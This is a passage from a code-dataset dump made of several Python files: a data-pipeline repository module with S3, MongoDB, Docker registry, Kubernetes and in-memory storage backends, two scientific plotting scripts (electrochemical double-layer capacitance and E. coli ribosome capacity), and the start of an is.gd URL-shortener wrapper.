__init__(self, *args, discard_empty=False, **kwargs):\n \"\"\"\n :param discard_empty: Whether only directories containing at least one member should be considered as \"present\"\n in the repository.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.discard_empty = discard_empty\n\n @job_getter\n async def mkdir(self, job):\n \"\"\"\n Create an empty directory corresponding to ``job``. 
Do nothing if the directory already exists.\n \"\"\"\n try:\n await aiofiles.os.mkdir(self.fullpath(job))\n except FileExistsError:\n pass\n\n async def delete(self, job):\n if await self.contains(job):\n await aioshutil.rmtree(self.fullpath(job))\n\n async def contains(self, item):\n result = await super().contains(item)\n if not self.discard_empty:\n return result\n if not result:\n return False\n return bool(list(await aiofiles.os.listdir(self.fullpath(item))))\n\n async def unfiltered_iter(self):\n async for item in super().unfiltered_iter():\n if self.discard_empty:\n if bool(list(await aiofiles.os.listdir(self.fullpath(item)))):\n yield item\n else:\n yield item\n\n\nclass S3BucketBinaryWriter:\n \"\"\"\n A class for streaming (or buffering) byte data to be written to an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, repo: \"S3BucketRepository\", job: str):\n self.repo = repo\n self.job = job\n self.buffer = io.BytesIO()\n super().__init__()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n async def close(self):\n \"\"\"\n Close and flush the data to the bucket.\n \"\"\"\n self.buffer.seek(0, io.SEEK_END)\n size = self.buffer.tell()\n self.buffer.seek(0, io.SEEK_SET)\n await self.repo.client.put_object(\n Bucket=self.repo.bucket,\n Key=self.repo.object_name(self.job),\n Body=self.buffer,\n ContentLength=size,\n ContentType=self.repo.mimetype,\n )\n\n async def write(self, data: bytes):\n \"\"\"\n Write some data to the stream.\n \"\"\"\n self.buffer.write(data)\n\n\nclass S3BucketReader:\n \"\"\"\n A class for streaming byte data from an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, body):\n self.body = body\n\n async def close(self):\n \"\"\"\n Close and release the stream.\n \"\"\"\n self.body.close()\n\n async def read(self, n=None): # pylint: disable=unused-argument :(\n \"\"\"\n Read the entire body of the blob. Due to API limitations, we can't read less than that at once...\n \"\"\"\n return await self.body.read()\n\n async def __aenter__(self):\n await self.body.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.body.__aexit__(exc_type, exc_val, exc_tb)\n\n\nclass S3BucketInfo:\n \"\"\"\n The data structure returned from :meth:`S3BucketRepository.info`.\n\n :ivar uri: The s3 URI of the current job's resource, e.g. ``s3://bucket/prefix/job.ext``. ``str(info)`` will also\n return this.\n :ivar endpoint: The URL of the API server providing the S3 interface.\n :ivar bucket: The name of the bucket objects are stored in.\n :ivar prefix: How to prefix an object name such that it will fit into this repository.\n :ivar suffix: How to suffix an object name such that it will fit into this repository.\n \"\"\"\n\n def __init__(self, endpoint: str, uri: str, bucket: str, prefix: str, suffix: str):\n self.endpoint = endpoint\n self.uri = uri\n self.prefix = prefix\n self.suffix = suffix\n self.bucket = bucket\n\n def __str__(self):\n return self.uri\n\n\nclass S3BucketRepository(BlobRepository):\n \"\"\"\n A repository where keys are paths in a S3 bucket. 
Provides a streaming interface to the corresponding blobs.\n \"\"\"\n\n def __init__(\n self,\n client: Callable[[], S3Client],\n bucket: str,\n prefix: str = \"\",\n suffix: str = \"\",\n mimetype: str = \"application/octet-stream\",\n incluster_endpoint: Optional[str] = None,\n ):\n \"\"\"\n :param client: A callable returning an aiobotocore S3 client connected and authenticated to the server you wish\n to store things on.\n :param bucket: The name of the bucket from which to load and store.\n :param prefix: A prefix to put on the job name before translating it into a bucket path. If this is meant to be\n a directory name it should end with a slash character.\n :param suffix: A suffix to put on the job name before translating it into a bucket path. If this is meant to\n be a file extension it should start with a dot.\n :param mimetype: The MIME type to set the content when adding data.\n :param incluster_endpoint: Optional: An endpoint URL to provide as the result of info() queries instead of\n extracting the URL from ``client``.\n \"\"\"\n self._client = client\n self.bucket = bucket\n self.prefix = prefix\n self.suffix = suffix\n self.mimetype = mimetype\n self.incluster_endpoint = incluster_endpoint\n\n @property\n def client(self):\n \"\"\"\n The aiobotocore S3 client. This will raise an error if the client comes from a session which is not opened.\n \"\"\"\n return self._client()\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.bucket}/{self.prefix}*{self.suffix}>\"\n\n async def contains(self, item):\n try:\n await self.client.head_object(Bucket=self.bucket, Key=self.object_name(item))\n except botocore.exceptions.ClientError:\n return False\n else:\n return True\n\n async def unfiltered_iter(self):\n paginator = self.client.get_paginator(\"list_objects\")\n async for page in paginator.paginate(Bucket=self.bucket, Prefix=self.prefix):\n for obj in page.get(\"Contents\", []):\n if obj[\"Key\"].endswith(self.suffix):\n yield obj[\"Key\"][len(self.prefix) : -len(self.suffix) if self.suffix else None]\n\n async def validate(self):\n try:\n await self.client.head_bucket(Bucket=self.bucket)\n except botocore.exceptions.ClientError as e:\n if \"404\" in str(e):\n await self.client.create_bucket(Bucket=self.bucket)\n else:\n raise\n\n def object_name(self, job):\n \"\"\"\n Return the object name for the given job.\n \"\"\"\n return f\"{self.prefix}{job}{self.suffix}\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n if mode == \"wb\":\n return S3BucketBinaryWriter(self, job)\n elif mode == \"w\":\n return AWriteText(S3BucketBinaryWriter(self, job))\n elif mode == \"rb\":\n return S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n elif mode == \"r\":\n return AReadText(\n S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n )\n else:\n raise ValueError(mode)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Return an `S3BucketInfo` corresponding to the given job.\n \"\"\"\n return S3BucketInfo(\n self.incluster_endpoint or self.client._endpoint.host,\n f\"s3://{self.bucket}/{self.object_name(job)}\",\n self.bucket,\n self.prefix,\n self.suffix,\n )\n\n async def delete(self, job):\n await self.client.delete_object(Bucket=self.bucket, Key=self.object_name(job))\n\n\nclass MongoMetadataRepository(MetadataRepository):\n \"\"\"\n A metadata repository using a MongoDB collection as the backing 
store.\n \"\"\"\n\n def __init__(\n self,\n collection: Callable[[], motor.motor_asyncio.AsyncIOMotorCollection],\n subcollection: Optional[str],\n ):\n \"\"\"\n :param collection: A callable returning a motor async collection.\n :param subcollection: Optional: the name of a subcollection within the collection in which to store data.\n \"\"\"\n self._collection = collection\n self._subcollection = subcollection\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self._subcollection}>\"\n\n @property\n def collection(self) -> motor.motor_asyncio.AsyncIOMotorCollection:\n \"\"\"\n The motor async collection data will be stored in. If this is provided by an unopened session, raise an error.\n \"\"\"\n result = self._collection()\n if self._subcollection is not None:\n result = result[self._subcollection]\n return result\n\n async def contains(self, item):\n return await self.collection.count_documents({\"_id\": item}) != 0\n\n async def delete(self, job):\n await self.collection.delete_one({\"_id\": job})\n\n async def unfiltered_iter(self):\n async for x in self.collection.find({}, projection=[]):\n yield x[\"_id\"]\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info of a mongo metadata repository is the literal value stored in the repository with identifier ``job``.\n \"\"\"\n result = await self.collection.find_one({\"_id\": job})\n if result is None:\n result = {}\n return result\n\n async def info_all(self) -> Dict[str, Any]:\n return {entry[\"_id\"]: entry async for entry in self.collection.find({})}\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n await self.collection.replace_one({\"_id\": job}, data, upsert=True)\n\n\nclass DockerRepository(Repository):\n \"\"\"\n A docker repository is, well, an actual docker repository hosted in some registry somewhere. Keys translate to tags\n on this repository.\n \"\"\"\n\n def __init__(\n self,\n registry: Callable[[], docker_registry_client_async.DockerRegistryClientAsync],\n domain: str,\n repository: str,\n ):\n \"\"\"\n :param registry: A callable returning a\n `docker_registry_client_async <https://pypi.org/project/docker-registry-client-async/>`_\n client object with appropriate authentication information.\n :param domain: The registry domain to connect to, e.g. ``index.docker.io``.\n :param repository: The repository to store images in within the domain, e.g. ``myname/myrepo``.\n \"\"\"\n self._registry = registry\n self.domain = domain\n self.repository = repository\n\n @property\n def registry(self) -> docker_registry_client_async.DockerRegistryClientAsync:\n \"\"\"\n The ``docker_registry_client_async`` client object. If this is provided by an unopened session, raise an error.\n \"\"\"\n return self._registry()\n\n async def unfiltered_iter(self):\n try:\n image = docker_registry_client_async.ImageName(self.repository, endpoint=self.domain)\n tags = (await self.registry.get_tags(image)).tags[\"tags\"]\n if tags is None:\n return\n for tag in tags:\n yield tag\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.status != 404:\n raise\n\n def __repr__(self):\n return f\"<DockerRepository {self.domain}/{self.repository}:*>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by a docker repository is a dict with two keys, \"withdomain\" and \"withoutdomain\". e.g.:\n\n .. 
code::\n\n { \"withdomain\": \"docker.example.com/myname/myrepo:job\", \"withoutdomain\": \"myname/myrepo:job\" }\n \"\"\"\n return {\n \"withdomain\": f\"{self.domain}/{self.repository}:{job}\",\n \"withoutdomain\": f\"{self.repository}:{job}\",\n }\n\n def _dxf_auth(self, dxf_obj, response):\n # what a fucking hack\n for pattern, credentials in self.registry.credentials.items():\n if pattern.fullmatch(self.domain):\n result = credentials\n break\n else:\n raise PermissionError(\"Missing credentials for %s\" % self.domain)\n if self.registry.ssl:\n username, password = base64.b64decode(result).decode().split(\":\")\n dxf_obj.authenticate(username, password, response)\n else:\n dxf_obj._headers = {\"Authorization\": \"Basic \" + result}\n\n async def delete(self, job):\n # if not await self.contains(job):\n # return\n\n self._delete_inner(job) # blocking! epic fail\n\n def _delete_inner(self, job):\n random_data = os.urandom(16)\n random_digest = \"sha256:\" + hashlib.sha256(random_data).hexdigest()\n\n d = dxf.DXF(\n host=self.domain,\n repo=self.repository,\n auth=self._dxf_auth,\n insecure=not self.registry.ssl,\n )\n d.push_blob(data=random_data, digest=random_digest)\n d.set_alias(job, random_digest)\n d.del_alias(job)\n\n\nclass LiveKubeRepository(Repository):\n \"\"\"\n A repository where keys translate to ``job`` labels on running kube pods. This repository is constructed\n automatically by a `KubeTask` or subclass and is linked as the ``live`` repository. Do not construct this class\n manually.\n \"\"\"\n\n def __init__(self, task: \"KubeTask\"):\n self.task = task\n\n async def unfiltered_iter(self):\n for pod in await self.pods():\n yield pod.metadata.labels[\"job\"]\n\n async def contains(self, item):\n return bool(await self.task.podman.query(task=self.task.name, job=item))\n\n def __repr__(self):\n return f\"<LiveKubeRepository task={self.task.name}>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Cannot template with live kube info. Implement this if you have something in mind.\n \"\"\"\n return None\n\n async def pods(self) -> List[V1Pod]:\n \"\"\"\n A list of live pod objects corresponding to this repository.\n \"\"\"\n return await self.task.podman.query(task=self.task.name)\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from this repository will delete the pod.\n \"\"\"\n pods = await self.task.podman.query(job=job, task=self.task.name)\n for pod in pods: # there... 
really should be only one\n await self.task.delete(pod)\n # while await self.task.podman.query(job=job, task=self.task.name):\n # await asyncio.sleep(0.2)\n\n\nclass AggregateAndRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if all its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n counting = Counter()\n async for item in roundrobin([child.unfiltered_iter() for child in self.children.values()]):\n counting[item] += 1\n if counting[item] == len(self.children):\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if not await child.contains(item):\n return False\n return True\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate And repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate And repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass AggregateOrRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if any of its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n seen = set()\n for child in self.children.values():\n async for item in child.unfiltered_iter():\n if item in seen:\n continue\n seen.add(item)\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if await child.contains(item):\n return True\n return False\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate Or repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate Or repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass BlockingRepository(Repository):\n \"\"\"\n A class that is said to contain a job if ``source`` contains it and ``unless`` does not contain it\n \"\"\"\n\n def __init__(self, source: Repository, unless: Repository, enumerate_unless=True):\n self.source = source\n self.unless = unless\n self.enumerate_unless = enumerate_unless\n\n async def unfiltered_iter(self):\n if self.enumerate_unless:\n blocked = set()\n async for x in self.unless.unfiltered_iter():\n blocked.add(x)\n else:\n blocked = None\n async for item in self.source.unfiltered_iter():\n if self.enumerate_unless and item in blocked:\n continue\n if not self.enumerate_unless and self.unless.contains(item):\n continue\n yield item\n\n async def contains(self, item):\n return await self.source.contains(item) and not await self.unless.contains(item)\n\n @job_getter\n async def info(self, job):\n return await self.source.info(job)\n\n async def delete(self, job):\n await self.source.delete(job)\n\n\nclass YamlMetadataRepository(BlobRepository, MetadataRepository, ABC):\n \"\"\"\n A metadata repository based on a blob repository. 
When info is accessed, it will **load the target file into\n memory**, parse it as yaml, and return the resulting object.\n\n This is a base class, and must be overridden to implement the blob loading portion.\n \"\"\"\n\n @job_getter\n async def info(self, job):\n async with await self.open(job, \"rb\") as fp:\n s = await fp.read()\n return yaml.safe_load(s)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n s = yaml.safe_dump(data, None)\n async with await self.open(job, \"w\") as fp:\n await fp.write(s)\n\n\nclass YamlMetadataFileRepository(YamlMetadataRepository, FileRepository):\n \"\"\"\n A metadata repository based on a file blob repository.\n \"\"\"\n\n def __init__(self, filename, extension=\".yaml\", case_insensitive=False):\n super().__init__(filename, extension=extension, case_insensitive=case_insensitive)\n\n\nclass YamlMetadataS3Repository(YamlMetadataRepository, S3BucketRepository):\n \"\"\"\n A metadata repository based on a s3 bucket repository.\n \"\"\"\n\n def __init__(self, client, bucket, prefix, suffix=\".yaml\", mimetype=\"text/yaml\"):\n super().__init__(client, bucket, prefix, suffix=suffix, mimetype=mimetype)\n\n @job_getter\n async def info(self, job):\n try:\n return await super().info(job)\n except botocore.exceptions.ClientError as e:\n if \"NoSuchKey\" in str(e):\n return {}\n else:\n raise\n\n\nclass RelatedItemRepository(Repository):\n \"\"\"\n A repository which returns items from another repository based on following a related-item lookup.\n \"\"\"\n\n def __init__(\n self,\n base_repository: Repository,\n translator_repository: Repository,\n allow_deletes=False,\n prefetch_lookup=True,\n ):\n \"\"\"\n :param base_repository: The repository from which to return results based on translated keys. The resulting\n repository will duck-type as the same type as the base.\n :param translator_repository: A repository whose info() will be used to translate keys:\n ``info(job) == translated_job``.\n :param allow_deletes: Whether the delete operation on this repository does anything. 
If enabled, it will delete\n only from the base repository.\n :param prefetch_lookup: Whether to cache the entirety of the translator repository in memory to improve\n performance.\n \"\"\"\n self.base_repository = base_repository\n self.translator_repository = translator_repository\n self.allow_deletes = allow_deletes\n self.prefetch_lookup_setting = prefetch_lookup\n self.prefetch_lookup = None\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.base_repository} by {self.translator_repository}>\"\n\n async def _lookup(self, item):\n if self.prefetch_lookup is None and self.prefetch_lookup_setting:\n self.prefetch_lookup = await self.translator_repository.info_all()\n if self.prefetch_lookup:\n return self.prefetch_lookup.get(item)\n else:\n return await self.translator_repository.info(item)\n\n async def contains(self, item):\n basename = await self._lookup(item)\n if basename is None:\n return False\n return await self.base_repository.contains(basename)\n\n async def delete(self, job):\n if not self.allow_deletes:\n return\n\n basename = await self._lookup(job)\n if basename is None:\n return\n\n await self.base_repository.delete(basename)\n\n @job_getter\n async def info(self, job):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n\n return await self.base_repository.info(basename)\n\n def __getattr__(self, item):\n v = getattr(self.base_repository, item)\n if not getattr(v, \"is_job_getter\", False):\n return v\n\n async def inner(job, *args, **kwargs):\n basename = await self._lookup(job)\n if basename is None:\n raise LookupError(job)\n return await v(basename, *args, **kwargs)\n\n return inner\n\n async def unfiltered_iter(self):\n base_contents = {x async for x in self.base_repository}\n async for item in self.translator_repository:\n basename = await self._lookup(item)\n if basename is not None and basename in base_contents:\n yield item\n\n\nclass ExecutorLiveRepo(Repository):\n \"\"\"\n A repository where keys translate to running jobs in an ExecutorTask. This repository is constructed automatically\n and is linked as the ``live`` repository. 
Do not construct this class manually.\n \"\"\"\n\n def __init__(self, task: \"ExecutorTask\"):\n self.task = task\n\n def __repr__(self):\n return f\"<{type(self).__name__} task={self.task.name}>\"\n\n async def unfiltered_iter(self):\n for job in self.task.rev_jobs:\n yield job\n\n async def contains(self, item):\n return item in self.task.rev_jobs\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from the repository will cancel the corresponding task.\n \"\"\"\n await self.task.cancel(job)\n\n async def info(self, job):\n \"\"\"\n There is no templating info for an `ExecutorLiveRepo`.\n \"\"\"\n return None\n\n\nclass InProcessMetadataRepository(MetadataRepository):\n \"\"\"\n An incredibly simple metadata repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, Any]] = None):\n self.data: Dict[str, Any] = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n return self.data.get(job)\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n self.data[job] = data\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del self.data[job]\n\n async def unfiltered_iter(self):\n for job in self.data:\n yield job\n\n\nclass InProcessBlobStream:\n \"\"\"\n A stream returned from an `BlobRepository.open` call from `InProcessBlobRepository`. Do not construct this manually.\n \"\"\"\n\n def __init__(self, repo: \"InProcessBlobRepository\", job: str): # pylint: disable=missing-function-docstring\n self.repo = repo\n self.job = job\n self.data = io.BytesIO(repo.data.get(job, b\"\"))\n\n async def read(self, n: Optional[int] = None) -> bytes:\n \"\"\"\n Read up to ``n`` bytes from the stream.\n \"\"\"\n return self.data.read(n)\n\n async def write(self, data: bytes):\n \"\"\"\n Write ``data`` to the stream.\n \"\"\"\n self.data.write(data)\n\n async def close(self):\n \"\"\"\n Close and release the stream, syncing the data back to the repository.\n \"\"\"\n self.repo.data[self.job] = self.data.getvalue()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n\nclass InProcessBlobRepository(BlobRepository):\n \"\"\"\n An incredibly simple blob repository which stores all its values in a dict, and will let them vanish when the\n process terminates.\n \"\"\"\n\n def __init__(self, data: Optional[Dict[str, bytes]] = None):\n self.data = data if data is not None else {}\n\n def __repr__(self):\n return f\"<{type(self).__name__}>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n There is no templating info for an `InProcessBlobRepository`.\n \"\"\"\n return None\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n stream = InProcessBlobStream(self, job)\n if mode == \"r\":\n return AReadText(stream)\n elif mode == \"w\":\n return AWriteText(stream)\n else:\n return stream\n\n async def unfiltered_iter(self):\n for item in self.data:\n yield item\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del 
self.data[job]\n","repo_name":"rhelmot/pydatatask","sub_path":"pydatatask/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":39077,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"4158333907","text":"\"\"\"\nMaking Gouy-Chapman-Stern theory plots for introduction\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport matplotlib.transforms as mtransforms\n\nfrom edl import models\n\nrcParams[\"lines.linewidth\"] = 0.75\nrcParams[\"font.size\"] = 8\nrcParams[\"axes.linewidth\"] = 0.5\nrcParams[\"xtick.major.width\"] = 0.5\nrcParams[\"ytick.major.width\"] = 0.5\n\npotentials = np.linspace(-1, 1, 200)\n\nmodel = models.AqueousVariableStern(100e-3, 6, 6, 6, 6)\nsweep = model.potential_sweep(potentials, tol=1e-3)\n\nfig = plt.figure(figsize=(5, 2))\nax1 = fig.add_subplot(121)\nax2 = fig.add_subplot(122)\n\nax1.plot(\n sweep[\"phi0\"],\n sweep[\"charge\"] * 100,\n label=\"Cont.\",\n color=\"black\",\n)\nax2.plot(sweep[\"phi0\"], sweep[\"capacity\"] * 100, color=\"black\")\n\ncomsol_neg = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_neg.txt\")\ncomsol_pos = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_pos.txt\")\nchg_neg = comsol_neg[:, 1] / model.kappa_debye**2 / (35e-9) ** 2 / np.pi\nchg_pos = (\n (comsol_pos[:, 1] - comsol_pos[0, 1] + comsol_neg[0, 1])\n / model.kappa_debye**2\n / (35e-9) ** 2\n / np.pi\n)\nphi = np.concatenate([comsol_neg[::-1, 0], comsol_pos[:, 0]], axis=0)\nchg = np.concatenate([chg_neg[::-1], chg_pos], axis=0)\ncap = np.gradient(chg_neg[::-1], comsol_neg[::-1, 0])\n\nax1.plot(phi, chg, \"k--\", label=\"70nm\")\nax2.plot(comsol_neg[::-1, 0], cap, \"k--\")\nax1.set_xlim([-1, 1])\nax1.set_ylabel(r\"$\\sigma$ / $\\mu$C cm$^{-2}$\")\nax1.set_xlabel(r\"$\\phi_0$ / V\")\nax2.set_xlabel(r\"$\\phi_0$ / V\")\nax1.legend(frameon=False)\nax2.set_ylabel(r\"$C$ / $\\mu$F cm$^{-2}$\")\nax2.set_xlim([-1, 0])\nax2.set_ylim([0, 100])\n\nlabels = [\"(a)\", \"(b)\", \"(c)\", \"(d)\", \"(e)\", \"(f)\"]\nfor label, axis in zip(labels, fig.axes):\n # label physical distance to the left and up:\n trans = mtransforms.ScaledTranslation(-25 / 72, 10 / 72, fig.dpi_scale_trans)\n axis.text(\n 0.0,\n 1.0,\n label,\n transform=axis.transAxes + trans,\n fontsize=\"medium\",\n va=\"bottom\",\n )\n\nplt.tight_layout()\nplt.savefig(\"figures/comsol-cap.pdf\")\nplt.show()\n","repo_name":"lucasdekam/double-layer-modelling","sub_path":"plot_comsol_data.py","file_name":"plot_comsol_data.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35862450544","text":"\"\"\"\nPlots ribosome capacity\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom six.moves import cPickle\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\n\nfrom models.ecoli.analysis import singleAnalysisPlot\nfrom wholecell.analysis.analysis_tools import exportFigure\nfrom wholecell.analysis.analysis_tools import read_bulk_molecule_counts\nfrom wholecell.io.tablereader import TableReader\nfrom wholecell.utils import units\n\nFONT = {\n\t'size':\t8\n\t}\n\n\nclass Plot(singleAnalysisPlot.SingleAnalysisPlot):\n\tdef do_plot(self, simOutDir, plotOutDir, plotOutFileName, simDataFile, validationDataFile, metadata):\n\t\twith open(simDataFile, 'rb') as f:\n\t\t\tsim_data = cPickle.load(f)\n\n\t\t# Load data from KB\n\t\tnAvogadro = 
sim_data.constants.n_avogadro\n\n\t\t# Listeners used\n\t\tunique_molecules_reader = TableReader(os.path.join(simOutDir, \"UniqueMoleculeCounts\"))\n\t\tmain_reader = TableReader(os.path.join(simOutDir, \"Main\"))\n\t\tribosome_reader = TableReader(os.path.join(simOutDir, \"RibosomeData\"))\n\n\t\t# Get IDs of ribosome subunits\n\t\tribosome_subunit_ids = [\n\t\t\tsim_data.molecule_ids.s50_full_complex,\n\t\t\tsim_data.molecule_ids.s30_full_complex,\n\t\t\t]\n\n\t\t# Get masses of full ribosomes and subunits\n\t\tribosome_subunit_masses = sim_data.getter.get_masses(ribosome_subunit_ids)\n\t\tfull_ribosome_mass = units.sum(ribosome_subunit_masses)\n\n\t\t# Read time data\n\t\tinitial_time = main_reader.readAttribute(\"initialTime\")\n\t\ttime = main_reader.readColumn(\"time\") - initial_time\n\t\ttimeStep = main_reader.readColumn(\"timeStepSec\")\n\n\t\t# Calculate the elongation rate for the given condition\n\t\tnutrients = sim_data.conditions[sim_data.condition][\"nutrients\"]\n\t\telongation_rate = sim_data.process.translation.ribosomeElongationRateDict[nutrients].asNumber(units.aa/units.s)\n\n\t\t# Load ribosome data\n\t\tactual_elongations = ribosome_reader.readColumn(\"actualElongations\")\n\t\tactual_elongation_rate = actual_elongations / timeStep\n\n\t\t# Load counts of subunits and active ribosomes\n\t\t(ribosome_subunit_counts, ) = read_bulk_molecule_counts(\n\t\t\tsimOutDir, (ribosome_subunit_ids, ))\n\t\tactive_ribosome_index = unique_molecules_reader.readAttribute(\"uniqueMoleculeIds\").index('active_ribosome')\n\t\tactive_ribosome_counts = unique_molecules_reader.readColumn(\"uniqueMoleculeCounts\")[:, active_ribosome_index]\n\n\t\t# Calculate statistics\n\t\ttotal_ribosome_counts = active_ribosome_counts + ribosome_subunit_counts.min(axis=1)\n\t\ttotal_ribosome_capacity = total_ribosome_counts * elongation_rate\n\n\t\tfree_subunit_mass = (\n\t\t\t(ribosome_subunit_masses * ribosome_subunit_counts / nAvogadro).asNumber(units.fg)\n\t\t\t).sum(axis=1)\n\t\tactive_ribosome_mass = (full_ribosome_mass * active_ribosome_counts / nAvogadro).asNumber(units.fg)\n\t\ttotal_ribosome_mass = free_subunit_mass + active_ribosome_mass\n\t\tmass_fraction_active = active_ribosome_mass / total_ribosome_mass\n\n\t\tplt.figure(figsize = (8.5, 15))\n\t\tplt.rc('font', **FONT)\n\n\t\tribosomeCapacity_axis = plt.subplot(6,1,1)\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., total_ribosome_capacity,\n\t\t\tlabel=\"Theoretical total ribosome rate\", linewidth=2, color='b')\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tribosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tribosomeCapacity_axis.legend(ncol=2)\n\n\t\tactiveRibosomeCapacity_axis = plt.subplot(6,1,2)\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., active_ribosome_counts * elongation_rate,\n\t\t\tlabel=\"Theoretical active ribosome rate\", linewidth=2, color='b')\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tinactiveRibosomeCapacity_axis = plt.subplot(6,1,3)\n\t\tinactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., ribosome_subunit_counts.min(axis=1) * elongation_rate,\n\t\t\tlabel=\"Theoretical inactive ribosome rate\", linewidth=2, 
color='b')\n\t\tinactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tinactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tfractionalCapacity_axis = plt.subplot(6,1,4)\n\t\tfractionalCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / total_ribosome_capacity,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionalCapacity_axis.set_ylabel(\"Fraction of total ribosome capacity used\")\n\n\t\teffectiveElongationRate_axis = plt.subplot(6,1,5)\n\t\teffectiveElongationRate_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / active_ribosome_counts,\n\t\t\tlinewidth=2, color='k')\n\t\teffectiveElongationRate_axis.set_ylabel(\"Relative elongation rate (aa/s/ribosome)\")\n\n\t\tfractionActive_axis = plt.subplot(6,1,6)\n\t\tfractionActive_axis.plot(\n\t\t\ttime / 60., mass_fraction_active,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionActive_axis.set_ylabel(\"Mass fraction of active ribosomes\")\n\t\tfractionActive_axis.set_yticks(np.arange(0., 1.1, 0.1))\n\n\t\t# Save\n\t\tplt.tight_layout()\n\t\texportFigure(plt, plotOutDir, plotOutFileName, metadata)\n\t\tplt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n\tPlot().cli()\n","repo_name":"CovertLab/WholeCellEcoliRelease","sub_path":"models/ecoli/analysis/single/ribosomeCapacity.py","file_name":"ribosomeCapacity.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"16"} +{"seq_id":"3633861828","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# is gd api wrapper\n\nimport urllib\nimport requests\n\nclass IsGd:\n \n API_URL = 'http://is.gd/api.php?longurl='\n \n def shorten(self,uri):\n resp = requests.get(self.API_URL+urllib.quote(uri), timeout=30)\n if resp:\n return resp\n else:\n return 